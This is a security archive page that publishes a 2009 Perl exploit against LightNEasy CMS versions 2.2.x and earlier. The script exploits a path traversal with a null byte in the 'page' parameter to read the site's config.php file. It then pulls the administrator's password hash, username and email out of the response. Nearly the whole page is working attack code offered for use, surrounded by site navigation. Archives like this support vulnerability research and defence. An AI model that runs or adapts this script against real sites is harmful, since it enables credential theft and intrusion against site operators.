what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

LightNEasy sql/no-db 2.2.x Configuration Disclosure

LightNEasy sql/no-db 2.2.x Configuration Disclosure
Posted Jun 10, 2009
Authored by StAkeR

LightNEasy sql/no-db versions 2.2.x and below system configuration disclosure exploit.

tags | exploit, info disclosure
SHA-256 | 37e608575685af6f2870722c95ef79349e48bb8f5deb588dab5becef98fdb979

LightNEasy sql/no-db 2.2.x Configuration Disclosure

Change Mirror Download
#!/usr/bin/perl
#
# LightNEasy sql/no-db <= 2.2.x system config disclosure exploit
#
# by staker
# ------------------------------
# mail: staker[at]hotmail[dot]it
# url: http://www.lightneasy.org
# ------------------------------
#
# it works with magic_quotes_gpc=off
#
# short explanation:
#
# -----------------------------------------------------
# LightNEasy contains one flaw that allows an attacker
# to disclose a local file because of file_get_contents
# it's possible to retrieve the configuration file
# passing as argument '../data/config.php'. Example:
# http://[host]/LightNEasy.php?page=../data/config.php
# ----------------------------------------------------
# Today is: 09 June 2009
# Location: Italy,Turin.
# http://www.youtube.com/watch?v=uXN0pE2Hdt8
# ----------------------------------------------------

use IO::Socket;


my $domain = $ARGV[0] || &usage;


launch_cmd("../data/config.php"); # if you wanna disclose another file,change it


sub launch_cmd()
{
my ($data,$result,$html);

my $page = $_[0] || die $!;
my $path = socket_url($domain,'path');
my $host = socket_url($domain,'host');

my $TCP = IO::Socket::INET->new(
PeerAddr => $host,
PeerPort => 80,
Proto => 'tcp',
) || die $!;

$data .= "GET /$path/LightNEasy.php?page=$page%00 HTTP/1.1\r\n";
$data .= "Host: $host\r\n";
$data .= "User-Agent: Lynx (textmode)\r\n";
$data .= "Connection: close\r\n\r\n";

$TCP->send($data);

while (<$TCP>) {
$html .= $_;
}

if ($html =~ /password']="([0-9a-f]{40})"/i) {
$result .= "Password: $1\n";
}
if ($html =~ /fromname']="(.+?)"/i) {
$result .= "Username: $1\n";
}
if ($html =~ /toemail']="(.+?)"/i) {
$result .= "E-Mail: $1\n";
}

print $result;
}


sub socket_url()
{
my ($url,$ext) = @_;

$url =~ s/http:\/\/// if $url =~ /^http:\/\/(.+?)+$/i;

@GLOBALS = split /\//,$url;

if ($ext eq 'host') {
return $GLOBALS[0];
}
elsif ($ext eq 'path') {
return $GLOBALS[1];
}
else {
return join('/',@GLOBALS);
}
}


sub parse_url
{
my $string = shift @_ || die($!);

if ($string !~ /^http:\/\/?/i) {
$string = 'http://'.$string;
}

return $string;
}


sub usage()
{
print "[*------------------------------------------------------------*]\n".
"[* LightNEasy sql/no-db < 2.2.x sys config disclosure exploit *]\n".
"[*------------------------------------------------------------*]\n".
"[* Usage: perl light.pl [domain] *]\n".
"[* [domain] domain -> http://localhost/lightneasy *]\n".
"[*------------------------------------------------------------*]\n";
exit;
}



Login or Register to add favorites

File Archive:

September 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    261 Files
  • 2
    Sep 2nd
    17 Files
  • 3
    Sep 3rd
    38 Files
  • 4
    Sep 4th
    52 Files
  • 5
    Sep 5th
    23 Files
  • 6
    Sep 6th
    27 Files
  • 7
    Sep 7th
    0 Files
  • 8
    Sep 8th
    1 Files
  • 9
    Sep 9th
    16 Files
  • 10
    Sep 10th
    38 Files
  • 11
    Sep 11th
    21 Files
  • 12
    Sep 12th
    40 Files
  • 13
    Sep 13th
    18 Files
  • 14
    Sep 14th
    0 Files
  • 15
    Sep 15th
    0 Files
  • 16
    Sep 16th
    21 Files
  • 17
    Sep 17th
    51 Files
  • 18
    Sep 18th
    23 Files
  • 19
    Sep 19th
    0 Files
  • 20
    Sep 20th
    0 Files
  • 21
    Sep 21st
    0 Files
  • 22
    Sep 22nd
    0 Files
  • 23
    Sep 23rd
    0 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close